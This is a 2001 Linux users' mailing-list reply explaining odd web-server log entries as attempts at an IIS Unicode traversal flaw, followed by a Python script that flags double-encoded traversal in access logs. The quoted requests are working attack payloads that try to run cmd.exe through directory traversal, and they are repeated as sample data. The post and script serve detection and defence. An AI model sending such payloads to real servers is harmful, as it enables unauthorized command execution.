[NTLUG:Discuss] httpd access_log
merlin
merlin at merlinslair.org
Tue Nov 6 14:08:17 CST 2001
On Tue, 6 Nov 2001, Michael B. Lee wrote:
> anyone know what this means? this is from one of my Mandrake boxes.
> there's a ton of these things constantly hitting my webserver.
>
> 4.35.160.227 - - [06/Nov/2001:13:57:11 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
> 4.35.160.227 - - [06/Nov/2001:13:57:11 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
If I remember correctly from a MS Security Bulletin, they are attempting
to exploit an IIS vulnerability where a malformed Unicode URL will allow
programs not normally accessible from the web server to be executed.
--
Merlin
Each problem that I solved became a rule
which served afterwards to solve other problems.
--Rene Descartes
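
Added example, not part of the original thread: a small access_log triage script that percent-decodes each request path until it stops changing and flags paths where `..` next to a slash or backslash only appears after two or more decoding rounds, which is the shape of the two quoted requests (`%25%35%63` decodes to `%5c`, then to a backslash; `%252f` to `%2f`, then to a slash). The function names and the third, benign log line are constructed for illustration.

```python
import re
from urllib.parse import unquote

# The two log lines quoted in the post (each joined onto one line),
# plus one constructed benign request for contrast (not from the post).
SAMPLE_LOG = [
    '4.35.160.227 - - [06/Nov/2001:13:57:11 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325 "-" "-"',
    '4.35.160.227 - - [06/Nov/2001:13:57:11 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325 "-" "-"',
    '192.0.2.10 - - [06/Nov/2001:13:58:02 -0600] "GET /docs/a%20b.html HTTP/1.0" 200 1043 "-" "-"',
]

# client, timestamp, method, request target, status, size (common/combined format)
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)(?: [^"]*)?" (\d{3}) (\S+)')
# ".." as a whole path segment, delimited by "/" or "\"
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')

def decode_rounds(path, limit=5):
    """Percent-decode repeatedly until the value is stable; return (final, rounds)."""
    rounds = 0
    while rounds < limit:
        nxt = unquote(path, encoding='latin-1')
        if nxt == path:
            break
        path, rounds = nxt, rounds + 1
    return path, rounds

def classify(line):
    """Parse one log line; return None if it is not in the expected format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    client, _ts, _method, target, status, _size = m.groups()
    decoded, rounds = decode_rounds(target.split('?', 1)[0])
    return {
        'client': client,
        'status': int(status),
        'decoded_path': decoded,
        'rounds': rounds,
        'double_encoded': rounds >= 2,   # one round is normal URL encoding
        'traversal': bool(TRAVERSAL_RE.search(decoded)),
    }

def suspicious(lines):
    """Requests whose traversal sequence was hidden behind nested encoding."""
    hits = (classify(l) for l in lines)
    return [h for h in hits if h and h['traversal'] and h['double_encoded']]

if __name__ == '__main__':
    for hit in suspicious(SAMPLE_LOG):
        print(hit['client'], hit['status'], hit['rounds'], hit['decoded_path'])
```

Grouping the hits by client address and status code shows at a glance whether any such request received something other than a 404.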